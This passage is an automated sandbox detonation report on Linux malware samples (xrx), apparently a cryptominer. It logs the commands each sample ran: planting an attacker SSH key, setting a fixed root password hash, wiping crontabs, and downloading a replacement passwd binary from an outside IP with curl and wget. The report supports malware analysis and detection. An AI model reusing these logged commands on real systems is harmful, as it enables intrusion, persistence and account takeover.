File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/level /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/devices/system/node/online /tmp/xrx/xrx N/A
File opened for reading /sys/firmware/dmi/tables/smbios_entry_point /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/level /tmp/xrx/xrx N/A
File opened for reading /sys/bus/dax/devices /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/access1/initiators /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/size /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/fs/cgroup/cpuset/cpuset.mems /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/cpumap /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_bandwidth /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_siblings /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/base_frequency /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/hugepages /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/level /tmp/xrx/xrx N/A
File opened for reading /sys/firmware/dmi/tables/DMI /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_latency /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/type /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/type /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/size /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/physical_package_id /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/size /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/access0/initiators /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id /tmp/xrx/xrx N/A
File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/type /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/type /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/meminfo /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets /tmp/xrx/xrx N/A
File opened for reading /sys/kernel/mm/hugepages /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/thread_siblings /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/die_cpus /tmp/xrx/xrx N/A
File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages /tmp/xrx/xrx N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/mounts /tmp/xrx/xrx N/A
File opened for reading /proc/self/cpuset /tmp/xrx/xrx N/A
File opened for reading /proc/meminfo /tmp/xrx/xrx N/A
File opened for reading /proc/driver/nvidia/gpus /tmp/xrx/xrx N/A

Processes

/tmp/xrx/xrx

[/tmp/xrx/xrx]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
CH 179.43.154.189:2008 tcp
US 151.101.193.91:443 tcp
GB 89.187.167.4:443 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.62:443 tcp
CH 179.43.154.189:2008 tcp
CH 179.43.154.189:2008 tcp
CH 179.43.154.189:2008 tcp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

137s

Max time network

150s

Command Line

[/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383]

Signatures

Modifies password files for system users/groups

persistence credential_access defense_evasion
Description Indicator Process Target
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/chmod N/A

OS Credential Dumping

credential_access
Description Indicator Process Target
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/bin/sudo N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/bin/sudo N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/sbin/dpkg-preconfigure N/A
File opened for reading /etc/shadow /usr/bin/chattr N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/sudo N/A
N/A N/A /usr/bin/sudo N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Checks hardware identifiers (DMI)

antivm
Description Indicator Process Target
File opened for reading /sys/class/dmi/id/product_name /usr/bin/systemd-detect-virt N/A
File opened for reading /sys/class/dmi/id/sys_vendor /usr/bin/systemd-detect-virt N/A

Checks mountinfo of local process

antivm
Description Indicator Process Target
File opened for reading /proc/1/mountinfo /usr/bin/ischroot N/A
File opened for reading /proc/1/mountinfo /usr/bin/ischroot N/A

Creates/modifies Cron job

execution persistence privilege_escalation
Description Indicator Process Target
File opened for modification /etc/crontab /usr/bin/touch N/A

Deletes log files

defense_evasion
Description Indicator Process Target
File deleted /var/log/apt/eipp.log.xz /usr/bin/apt-get N/A

Enumerates running processes

Write file to user bin folder

persistence
Description Indicator Process Target
File opened for modification /usr/sbin/rdmsr.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/sbin/wrmsr.dpkg-new /usr/bin/dpkg N/A

Reads process memory

credential_access
Description Indicator Process Target
File opened for reading /proc/1/maps /usr/sbin/needrestart N/A
File opened for reading /proc/357/maps /usr/sbin/needrestart N/A
File opened for reading /proc/441/maps /usr/sbin/needrestart N/A
File opened for reading /proc/584/maps /usr/sbin/needrestart N/A
File opened for reading /proc/891/maps /usr/sbin/needrestart N/A
File opened for reading /proc/418/maps /usr/sbin/needrestart N/A
File opened for reading /proc/575/maps /usr/sbin/needrestart N/A
File opened for reading /proc/773/maps /usr/sbin/needrestart N/A
File opened for reading /proc/785/maps /usr/sbin/needrestart N/A
File opened for reading /proc/825/maps /usr/sbin/needrestart N/A
File opened for reading /proc/583/maps /usr/sbin/needrestart N/A
File opened for reading /proc/749/maps /usr/sbin/needrestart N/A
File opened for reading /proc/756/maps /usr/sbin/needrestart N/A
File opened for reading /proc/766/maps /usr/sbin/needrestart N/A
File opened for reading /proc/787/maps /usr/sbin/needrestart N/A
File opened for reading /proc/390/maps /usr/sbin/needrestart N/A
File opened for reading /proc/752/maps /usr/sbin/needrestart N/A
File opened for reading /proc/783/maps /usr/sbin/needrestart N/A
File opened for reading /proc/789/maps /usr/sbin/needrestart N/A
File opened for reading /proc/818/maps /usr/sbin/needrestart N/A
File opened for reading /proc/827/maps /usr/sbin/needrestart N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself pool-spawner /usr/bin/gdbus N/A
Changes the process name, possibly in an attempt to hide itself gmain /usr/bin/gdbus N/A
Changes the process name, possibly in an attempt to hide itself gdbus /usr/bin/gdbus N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/systemd-detect-virt N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/1909/stat /usr/bin/pkill N/A
File opened for reading /proc/22/cgroup /usr/bin/pkill N/A
File opened for reading /proc/2321/cgroup /usr/bin/pkill N/A
File opened for reading /proc/1945/cmdline /usr/bin/pkill N/A
File opened for reading /proc/783/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1074/ctty /usr/bin/pkill N/A
File opened for reading /proc/1995/cgroup /usr/bin/pkill N/A
File opened for reading /proc/33/cmdline /usr/sbin/needrestart N/A
File opened for reading /proc/1924/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1/status /usr/bin/pkill N/A
File opened for reading /proc/28/status /usr/bin/pkill N/A
File opened for reading /proc/51/stat /usr/bin/pkill N/A
File opened for reading /proc/1997/ctty /usr/bin/pkill N/A
File opened for reading /proc/51/ctty /usr/bin/pkill N/A
File opened for reading /proc/1802/stat /usr/bin/pkill N/A
File opened for reading /proc/583/status /usr/bin/pkill N/A
File opened for reading /proc/825/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1881/stat /usr/bin/pkill N/A
File opened for reading /proc/2248/stat /usr/bin/pkill N/A
File opened for reading /proc/7/cmdline /usr/bin/pkill N/A
File opened for reading /proc/37/cmdline /usr/sbin/needrestart N/A
File opened for reading /proc/1047/root/usr/lib/python3.12/opcode.py /usr/sbin/needrestart N/A
File opened for reading /proc/12/cmdline /usr/bin/pkill N/A
File opened for reading /proc/4/stat /usr/bin/pkill N/A
File opened for reading /proc/1988/status /usr/bin/pkill N/A
File opened for reading /proc/785/cgroup /usr/bin/pkill N/A
File opened for reading /proc/2296/stat /usr/bin/pkill N/A
File opened for reading /proc/26/status /usr/bin/pkill N/A
File opened for reading /proc/18/stat /usr/sbin/needrestart N/A
File opened for reading /proc/1/status /usr/bin/pkill N/A
File opened for reading /proc/1691/cgroup /usr/bin/pkill N/A
File opened for reading /proc/2478/status /usr/bin/pkill N/A
File opened for reading /proc/9/status /usr/bin/pkill N/A
File opened for reading /proc/1/ctty /usr/bin/pkill N/A
File opened for reading /proc/2251/cmdline /usr/bin/pkill N/A
File opened for reading /proc/18/cgroup /usr/bin/pkill N/A
File opened for reading /proc/1998/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1332/status /usr/bin/pkill N/A
File opened for reading /proc/35/ctty /usr/bin/pkill N/A
File opened for reading /proc/65/cgroup /usr/bin/pkill N/A
File opened for reading /proc/1995/cmdline /usr/bin/pkill N/A
File opened for reading /proc/9/cmdline /usr/bin/pkill N/A
File opened for reading /proc/2138/cgroup /usr/bin/pkill N/A
File opened for reading /proc/1114/environ /usr/sbin/needrestart N/A
File opened for reading /proc/11/cgroup /usr/bin/pkill N/A
File opened for reading /proc/67/ctty /usr/bin/pkill N/A
File opened for reading /proc/2238/status /usr/bin/pkill N/A
File opened for reading /proc/2248/cgroup /usr/bin/pkill N/A
File opened for reading /proc/2230/status /usr/bin/pkill N/A
File opened for reading /proc/48/status /usr/bin/pkill N/A
File opened for reading /proc/53/stat /usr/bin/pkill N/A
File opened for reading /proc/2/stat /usr/sbin/needrestart N/A
File opened for reading /proc/41/status /usr/sbin/needrestart N/A
File opened for reading /proc/1699/environ /usr/sbin/needrestart N/A
File opened for reading /proc/773/cmdline /usr/bin/pkill N/A
File opened for reading /proc/27/ctty /usr/bin/pkill N/A
File opened for reading /proc/40/cgroup /usr/bin/pkill N/A
File opened for reading /proc/2118/cgroup /usr/bin/pkill N/A
File opened for reading /proc/583/cgroup /usr/bin/pkill N/A
File opened for reading /proc/2248/stat /usr/bin/pkill N/A
File opened for reading /proc/1857/ctty /usr/bin/pkill N/A
File opened for reading /proc/1116/cgroup /usr/bin/pkill N/A
File opened for reading /proc/1689/stat /usr/bin/pkill N/A
File opened for reading /proc/39/status /usr/bin/pkill N/A

Software Deployment Tools

execution
Description Indicator Process Target
N/A N/A /usr/bin/dpkg-split N/A
N/A N/A /usr/bin/dpkg N/A
N/A N/A /usr/bin/apt-get N/A

Processes

/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383

[/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383 -c exec '/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383' "$@" /tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383]

/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383

[/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383]

/bin/bash

/usr/bin/apt-get

[apt-get install -y msr-tools]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/lib/apt/methods/http

[/usr/lib/apt/methods/http]

/usr/bin/ischroot

[/usr/bin/ischroot -t]

/usr/lib/apt/methods/http

[/usr/lib/apt/methods/http]

/bin/sh

[/bin/sh -c /usr/sbin/dpkg-preconfigure --apt || true]

/usr/sbin/dpkg-preconfigure

[/usr/sbin/dpkg-preconfigure --apt]

/usr/local/sbin/locale

[locale charmap]

/usr/local/bin/locale

[locale charmap]

/usr/sbin/locale

[locale charmap]

/usr/bin/locale

[locale charmap]

/usr/bin/dpkg

[/usr/bin/dpkg --assert-multi-arch]

/usr/bin/dpkg

[/usr/bin/dpkg --assert-protected-field]

/usr/bin/dpkg

[/usr/bin/dpkg --status-fd 32 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/sbin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/bin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/lib/needrestart/dpkg-status

[/usr/lib/needrestart/dpkg-status]

/usr/bin/mkdir

[mkdir -p /run/needrestart]

/usr/sbin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/bin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/sbin/dpkg-deb

[dpkg-deb --control /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg-deb

[dpkg-deb --control /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/sbin/tar

[tar -x -f - --warning=no-timestamp]

/usr/bin/tar

[tar -x -f - --warning=no-timestamp]

/usr/sbin/dpkg-deb

[dpkg-deb --fsys-tarfile /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/bin/dpkg-deb

[dpkg-deb --fsys-tarfile /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/bin/touch

[touch /run/needrestart/unpacked]

/usr/sbin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg

[/usr/bin/dpkg --status-fd 32 --configure --pending]

/usr/sbin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/bin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/lib/needrestart/dpkg-status

[/usr/lib/needrestart/dpkg-status]

/usr/bin/mkdir

[mkdir -p /run/needrestart]

/usr/bin/touch

[touch /run/needrestart/unpacked]

/var/lib/dpkg/info/man-db.postinst

[/var/lib/dpkg/info/man-db.postinst triggered /usr/share/man]

/usr/bin/setpriv

[setpriv --reuid man --regid man --init-groups -- /usr/bin/mandb -pq]

/usr/bin/mandb

[/usr/bin/mandb -pq]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/test

[/usr/bin/test -e /usr/share/dbus-1/system-services/org.freedesktop.PackageKit.service]

/usr/bin/test

[/usr/bin/test -S /var/run/dbus/system_bus_socket]

/usr/bin/gdbus

[/usr/bin/gdbus call --system --dest org.freedesktop.PackageKit --object-path /org/freedesktop/PackageKit --timeout 4 --method org.freedesktop.PackageKit.StateHasChanged cache-update]

/bin/echo

[/bin/echo]

/bin/sh

[sh -c -- test -x /usr/lib/needrestart/apt-pinvoke && /usr/lib/needrestart/apt-pinvoke -m u || true]

/usr/lib/needrestart/apt-pinvoke

[/usr/lib/needrestart/apt-pinvoke -m u]

/usr/bin/dbus-send

[dbus-send --system --dest=org.freedesktop.login1 --print-reply /org/freedesktop/login1 org.freedesktop.DBus.Properties.Get string:org.freedesktop.login1.Manager string:PreparingForShutdown]

/usr/bin/rm

[rm -f /run/needrestart/unpacked]

/usr/sbin/needrestart

[/usr/sbin/needrestart -m u]

/usr/bin/systemd-detect-virt

[/usr/bin/systemd-detect-virt --vm --quiet]

/usr/bin/systemd-detect-virt

[/usr/bin/systemd-detect-virt --container --quiet]

/usr/local/sbin/who

[who -r]

/usr/local/bin/who

[who -r]

/usr/sbin/who

[who -r]

/usr/bin/who

[who -r]

/usr/bin/python3.12

[/usr/bin/python3.12 -]

/bin/sh

[sh -c -- if [ -d /var/lib/update-notifier ]; then touch /var/lib/update-notifier/dpkg-run-stamp; fi; /usr/lib/update-notifier/update-motd-updates-available 2>/dev/null || true]

/usr/bin/touch

[touch /var/lib/update-notifier/dpkg-run-stamp]

/usr/lib/update-notifier/update-motd-updates-available

[/usr/lib/update-notifier/update-motd-updates-available]

/usr/bin/apt-config

[apt-config shell StateDir Dir::State]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell ListDir Dir::State::Lists]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell DpkgStatus Dir::State::status]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell EtcDir Dir::Etc]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell SourceList Dir::Etc::sourcelist]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/find

[find /var/lib/apt/lists/ /etc/apt/sources.list //var/lib/dpkg/status -type f -newer /var/lib/update-notifier/updates-available -print -quit]

/usr/bin/dirname

[dirname /var/lib/update-notifier/updates-available]

/usr/bin/mktemp

[mktemp -p /var/lib/update-notifier]

/usr/lib/update-notifier/apt-check

[/usr/lib/update-notifier/apt-check --human-readable ]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/ischroot

[/usr/bin/ischroot -t]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/mv

[mv /var/lib/update-notifier/tmp.i7HbXgX644 /var/lib/update-notifier/updates-available]

/usr/bin/chmod

[chmod +r /var/lib/update-notifier/updates-available]

/usr/bin/rm

[rm -f /var/lib/update-notifier/tmp.i7HbXgX644]

/usr/bin/cat

[cat /etc/passwd]

/usr/bin/cut

[cut -d: -f1]

/usr/bin/grep

[grep /bin/bash\|/bin/sh\|/zsh\|/fish]

/usr/bin/tr

[tr \n ]

/usr/bin/chmod

[chmod +x /var/tmp/.xrx/uninstall.sh]

/var/tmp/.xrx/uninstall.sh

[/var/tmp/.xrx/uninstall.sh 2]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/uninstall.sh]

/usr/bin/crontab

[crontab -r]

/usr/bin/chattr

[chattr -ia /etc/crontab]

/usr/bin/rm

[rm -rf /etc/crontab]

/usr/bin/touch

[touch /etc/crontab]

/usr/bin/pkill

[pkill -9 xri]

/usr/bin/pkill

[pkill -9 xrx]

/usr/bin/pkill

[pkill -STOP xxi]

/usr/bin/pkill

[pkill -STOP xmu]

/usr/bin/pkill

[pkill -STOP dhcpi]

/usr/bin/chattr

[chattr -i /usr/lib/updated 2]

/usr/bin/chattr

[chattr -a /usr/lib/updated 2]

/usr/bin/rm

[rm -rf /usr/lib/updated]

/tmp/样本/Linux/shc加密脚本/init.sh

[./init.sh]

/usr/bin/chattr

[chattr -i /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr -a /root/.ssh/authorized_keys]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys2]

/usr/bin/cp

[cp key /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr +ia /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr -ia /etc/shadow]

/usr/bin/chattr

[chattr -ia /etc/passwd]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ root]

/usr/bin/crontab

[crontab -u root -r]

/usr/bin/sudo

[sudo -u root sh -c echo $HOME]

/usr/bin/sh

[sh -c echo $HOME]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys]

/usr/bin/cp

[cp /var/tmp/.xrx/key /root/.ssh/authorized_keys]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ user]

/usr/bin/crontab

[crontab -u user -r]

/usr/bin/sudo

[sudo -u user sh -c echo $HOME]

/usr/bin/sh

[sh -c echo $HOME]

/usr/bin/rm

[rm -rf /home/user/.ssh/authorized_keys]

/usr/bin/cp

[cp /var/tmp/.xrx/key /home/user/.ssh/authorized_keys]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ root]

/usr/bin/chattr

[chattr -iae /bin/passwd]

/usr/bin/chattr

[chattr -iae /usr/bin/passwd]

/usr/bin/mv

[mv /bin/passwd /bin/passwd.orig]

/usr/bin/mv

[mv /usr/bin/passwd /usr/bin/passwd.orig]

/usr/bin/curl

[curl -sO http://185.252.178.82:6972/passwd]

/usr/bin/wget

[wget -q http://185.252.178.82:6972/passwd]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 _http._tcp.se.archive.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
SE 194.71.11.173:80 se.archive.ubuntu.com tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp

Files

/var/cache/apt/archives/partial/msr-tools_1.3-5build1_amd64.deb

/var/log/apt/eipp.log.xz

/var/lib/dpkg/updates/tmp.i

/var/lib/dpkg/tmp.ci/control

/var/lib/dpkg/tmp.ci/md5sums

/var/lib/dpkg/updates/tmp.i

/var/lib/dpkg/updates/tmp.i

/var/lib/dpkg/updates/tmp.i

/var/lib/dpkg/updates/tmp.i

/var/lib/dpkg/status-new

/var/cache/man/2511

/var/lib/dpkg/status-new

/var/lib/update-notifier/tmp.i7HbXgX644

/etc/passwd+

/etc/shadow+

/etc/shadow+

Analysis: behavioral16

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

0s

Max time network

128s

Command Line

[/tmp/xrx/chattr]

Signatures

N/A

Processes

/tmp/xrx/chattr

[/tmp/xrx/chattr]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

150s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\xrx\config.json

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\xrx\config.json

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 99.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 69.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral20

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

ubuntu2404-amd64-20240729-en

Max time kernel

140s

Max time network

149s

Command Line

[/tmp/xrx/init0]

Signatures

Adds new SSH keys

persistence privilege_escalation
Description Indicator Process Target
File opened for modification /root/.ssh/authorized_keys /usr/bin/cp N/A

Modifies password files for system users/groups

persistence credential_access defense_evasion
Description Indicator Process Target
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A

File and Directory Permissions Modification

defense_evasion
